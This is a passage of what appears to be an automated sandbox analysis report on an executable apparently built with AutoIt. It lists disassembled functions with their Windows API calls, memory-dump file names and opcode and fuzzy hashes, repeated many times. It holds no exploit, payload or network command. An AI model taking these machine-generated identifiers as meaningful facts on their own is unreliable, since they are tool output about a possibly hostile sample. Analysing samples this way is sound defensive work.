                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                                                        • String ID: .S
                                                                                                                        • API String ID: 2434981716-1539595904
                                                                                                                        • Opcode ID: b00082088acc37bbf87162f7e33cde85b6b5a706494779aad554395f90418ada
                                                                                                                        • Instruction ID: 61160430dc0af42a2c6ce47f131ebf2d9356acf99187ec2df56aaa95f0567b98
                                                                                                                        • Opcode Fuzzy Hash: b00082088acc37bbf87162f7e33cde85b6b5a706494779aad554395f90418ada
                                                                                                                        • Instruction Fuzzy Hash: 40419D70604045AFCB249F25CC84AFD7FE5FB8631CF2885AAF8958B242DE71CC429790
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ty1nyFUMlo.exe,00000104), ref: 00541769
                                                                                                                        • _free.LIBCMT ref: 00541834
                                                                                                                        • _free.LIBCMT ref: 0054183E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                        • String ID: C:\Users\user\Desktop\ty1nyFUMlo.exe
                                                                                                                        • API String ID: 2506810119-3999978784
                                                                                                                        • Opcode ID: 85266c84dfedaa20b5a7290546344e0bfc9e02bd7658e47d04f4e2feb068dd38
                                                                                                                        • Instruction ID: eeee8538d5b81146783530cfec5b4309f3ba51fceb5c8e64b119fbbb5fd5db2b
                                                                                                                        • Opcode Fuzzy Hash: 85266c84dfedaa20b5a7290546344e0bfc9e02bd7658e47d04f4e2feb068dd38
                                                                                                                        • Instruction Fuzzy Hash: 5331BC75A00A58ABDB25DB9A9C84DDEBFFCFB95314F104166F8049B211D6708A80DB98
                                                                                                                        APIs
                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0057C306
                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0057C34C
                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005E1990,015155B8), ref: 0057C395
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 135850232-4108050209
                                                                                                                        • Opcode ID: 03565f18d6f4bf437eb29874ece6787541dfd90247eec257be14d44aeb22ef59
                                                                                                                        • Instruction ID: 82bc2f369544b9245633c3bd4eff52f0b4197526ff05008ff2d93bf76aac84ee
                                                                                                                        • Opcode Fuzzy Hash: 03565f18d6f4bf437eb29874ece6787541dfd90247eec257be14d44aeb22ef59
                                                                                                                        • Instruction Fuzzy Hash: A1418E712043029FD720DF25E884B5ABFE4BF85320F14CA1DF9A9972D1D730A904EB62
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,005ACC08,00000000,?,?,?,?), ref: 005A44AA
                                                                                                                        • GetWindowLongW.USER32 ref: 005A44C7
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A44D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long
                                                                                                                        • String ID: SysTreeView32
                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                        • Opcode ID: 7d29528cef674264b84be62b0e111c28e55fdb622321f230796781f3db644e79
                                                                                                                        • Instruction ID: 4873749e4507687ffc0272da20159f5b84f6073fe35ad84ddef6095fe723cada
                                                                                                                        • Opcode Fuzzy Hash: 7d29528cef674264b84be62b0e111c28e55fdb622321f230796781f3db644e79
                                                                                                                        • Instruction Fuzzy Hash: B9315C31210606AFDF219EB8DC45BEA7FA9FB8A334F204725F975921D0D7B0AC519B50
                                                                                                                        APIs
                                                                                                                        • SysReAllocString.OLEAUT32(?,?), ref: 00576EED
                                                                                                                        • VariantCopyInd.OLEAUT32(?,?), ref: 00576F08
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00576F12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$AllocClearCopyString
                                                                                                                        • String ID: *jW
                                                                                                                        • API String ID: 2173805711-2693160286
                                                                                                                        • Opcode ID: e222dacec7af85bcd0789438c73db7ac1fa2fcd13b4296e363e227b78d300cf1
                                                                                                                        • Instruction ID: 44ee51ad280366b0a565b4ed83e78f19bbb2caa039ebc39a47f9f52f1951dfdd
                                                                                                                        • Opcode Fuzzy Hash: e222dacec7af85bcd0789438c73db7ac1fa2fcd13b4296e363e227b78d300cf1
                                                                                                                        • Instruction Fuzzy Hash: BB31B371604606DFDB04AF64F8949BD3F76FF85300B104898F9064B2A1D7309D91EBA4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0059335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00593077,?,?), ref: 00593378
                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
                                                                                                                        • _wcslen.LIBCMT ref: 0059309B
                                                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00593106
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                        • String ID: 255.255.255.255
                                                                                                                        • API String ID: 946324512-2422070025
                                                                                                                        • Opcode ID: 78dd40aee28c6856205b5010857949670ddff2b7c8a1631a27753eb08665188b
                                                                                                                        • Instruction ID: b7988a32a94d354688cc7802369c09e2f709e1e9885909f3bd948fcabf683d35
                                                                                                                        • Opcode Fuzzy Hash: 78dd40aee28c6856205b5010857949670ddff2b7c8a1631a27753eb08665188b
                                                                                                                        • Instruction Fuzzy Hash: 2A31B039600202DFCB20CF68C589AAA7FE0FF55318F248459E9158B3A2DB32EE45D760
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005A4705
                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005A4713
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005A471A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                        • String ID: msctls_updown32
                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                        • Opcode ID: b97b30fca7c9fa717f541dffe9d8cca0d32186fd61603e6af52a40dd884655f9
                                                                                                                        • Instruction ID: c91d114d8811ffbe7e007e7097770fd6d48f963bac30f61831a6da48671c38db
                                                                                                                        • Opcode Fuzzy Hash: b97b30fca7c9fa717f541dffe9d8cca0d32186fd61603e6af52a40dd884655f9
                                                                                                                        • Instruction Fuzzy Hash: E72151B5600249AFDB10DF68DCC5DBB3BADFB9B394B040459FA019B261DB70EC51DA60
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                        • API String ID: 176396367-2734436370
                                                                                                                        • Opcode ID: 43ba29e6e5bae5d914dc9d1e1cb7a99fe7a18785f3e3b6bcea31d6be810b48cf
                                                                                                                        • Instruction ID: cd10c6d01f152332f5155d5cf581eff24f34541b12618ff2b35ce0a908ff0897
                                                                                                                        • Opcode Fuzzy Hash: 43ba29e6e5bae5d914dc9d1e1cb7a99fe7a18785f3e3b6bcea31d6be810b48cf
                                                                                                                        • Instruction Fuzzy Hash: 9921087210462266D331AA29AC06FBB7FACBFD5310F148426F94D97181EB51AD81E3F5
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005A3840
                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005A3850
                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 005A3876
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                        • String ID: Listbox
                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                        • Opcode ID: ac3c9b42013912ca22de0ad213a1a1cf7f631d677117bae5d8fa9a5fb8b1e451
                                                                                                                        • Instruction ID: 16ab0d73d7ec5fdddcefd8e1ad1e02aa67a76108507ea7a7b151b4ba6b84a5f6
                                                                                                                        • Opcode Fuzzy Hash: ac3c9b42013912ca22de0ad213a1a1cf7f631d677117bae5d8fa9a5fb8b1e451
                                                                                                                        • Instruction Fuzzy Hash: 3521BE72600219BBEB218F64CC85EBF3B6EFF8A754F108125F9009B190CA75DD528BA0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572258
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0057228A
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005722CA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 763830540-2594219639
                                                                                                                        • Opcode ID: 2f3efa7cce435c75fb6b18b1ee06b902171365d53b2fc8f855ad5007481d4600
                                                                                                                        • Instruction ID: 9e1159fe75dbbac9dd0ef8f7ec304e661fb2e9f376baa5e77a6b5d9479f045c6
                                                                                                                        • Opcode Fuzzy Hash: 2f3efa7cce435c75fb6b18b1ee06b902171365d53b2fc8f855ad5007481d4600
                                                                                                                        • Instruction Fuzzy Hash: 6921DA317002056BEF209B549D49EEE3FA9FB95710F048425FA09DB141EB70D945A7A2
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00584A08
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00584A5C
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,005ACC08), ref: 00584AD0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                        • String ID: %lu
                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                        • Opcode ID: 68cff9678ffcb0c9caef91b0f2b0e22263f4b529ac0c212f710bf53590214787
                                                                                                                        • Instruction ID: 0037eeb0ff125ed1899e4654c4d0db9e6e06dd6a80b791260e61ed13296bf692
                                                                                                                        • Opcode Fuzzy Hash: 68cff9678ffcb0c9caef91b0f2b0e22263f4b529ac0c212f710bf53590214787
                                                                                                                        • Instruction Fuzzy Hash: C7314B75A00209AFDB10DF54C885EAA7FF9FF49308F1480A5E909EB252DB71EE45CB61
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00571B4F
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00571B61
                                                                                                                        • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00571B99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 3e046d0da04dec33426f964713b66a5d1981b42b9b6b0fbd0c4380f80e85e692
                                                                                                                        • Instruction ID: b15c953f595a53e5585276f0438c956bc0dd7e644916e0abc7b8688a25c44554
                                                                                                                        • Opcode Fuzzy Hash: 3e046d0da04dec33426f964713b66a5d1981b42b9b6b0fbd0c4380f80e85e692
                                                                                                                        • Instruction Fuzzy Hash: 7821A431600519BFDB11DB9CE9419AEBBFDBF44340F10446AE109E7190DA71AE449B94
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000402,00000000,00000000), ref: 00590D24
                                                                                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00590D65
                                                                                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00590D8D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 18d14a03e0b7bd60b9f30443ab601934f51d46e23624566275145d10d23935b3
                                                                                                                        • Instruction ID: 6f49d8b782a9aa41e88af4dc1613f41679846ab11771eefa30ed008dacd51656
                                                                                                                        • Opcode Fuzzy Hash: 18d14a03e0b7bd60b9f30443ab601934f51d46e23624566275145d10d23935b3
                                                                                                                        • Instruction Fuzzy Hash: 03215C35200A01AFEB10EB68D985D6ABBE6FF59310B018855F9199B6B1DB30FC50DB90
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 005A424F
                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 005A4264
                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 005A4271
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                        • Opcode ID: 8d912a7132a55813900e5a631ffeac11ee593ad80096fec63b8d9d7627b5ce59
                                                                                                                        • Instruction ID: 641ec9e6f322ed538e558a8222291f584a4bb7f2c0851ce90431f072bffea93b
                                                                                                                        • Opcode Fuzzy Hash: 8d912a7132a55813900e5a631ffeac11ee593ad80096fec63b8d9d7627b5ce59
                                                                                                                        • Instruction Fuzzy Hash: 8011A331240248BEEF205E69CC46FAB3FACFFD6B54F110525FA55E6090D6B1DC519B50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                          • Part of subcall function 00572DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00572DC5
                                                                                                                          • Part of subcall function 00572DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00572DD6
                                                                                                                          • Part of subcall function 00572DA7: GetCurrentThreadId.KERNEL32 ref: 00572DDD
                                                                                                                          • Part of subcall function 00572DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00572DE4
                                                                                                                        • GetFocus.USER32 ref: 00572F78
                                                                                                                          • Part of subcall function 00572DEE: GetParent.USER32(00000000), ref: 00572DF9
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00572FC3
                                                                                                                        • EnumChildWindows.USER32(?,0057303B), ref: 00572FEB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                        • String ID: %s%d
                                                                                                                        • API String ID: 1272988791-1110647743
                                                                                                                        • Opcode ID: 7e13d4eee0aeb51ca3cd6c13c07e89be3ce19a6521083f4445ffc6e30d7a030b
                                                                                                                        • Instruction ID: 0284a40ecf1a234bd9a447240347ce344aa19da3ef18e3bce9d07fb704a45c16
                                                                                                                        • Opcode Fuzzy Hash: 7e13d4eee0aeb51ca3cd6c13c07e89be3ce19a6521083f4445ffc6e30d7a030b
                                                                                                                        • Instruction Fuzzy Hash: 9D11A2716002066BDF14BF74AC89EED3F6ABFD5314F048075B90D9B292DE30994AAB60
                                                                                                                        APIs
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 005A34AB
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005A34BA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                        • String ID: @U=u$edit
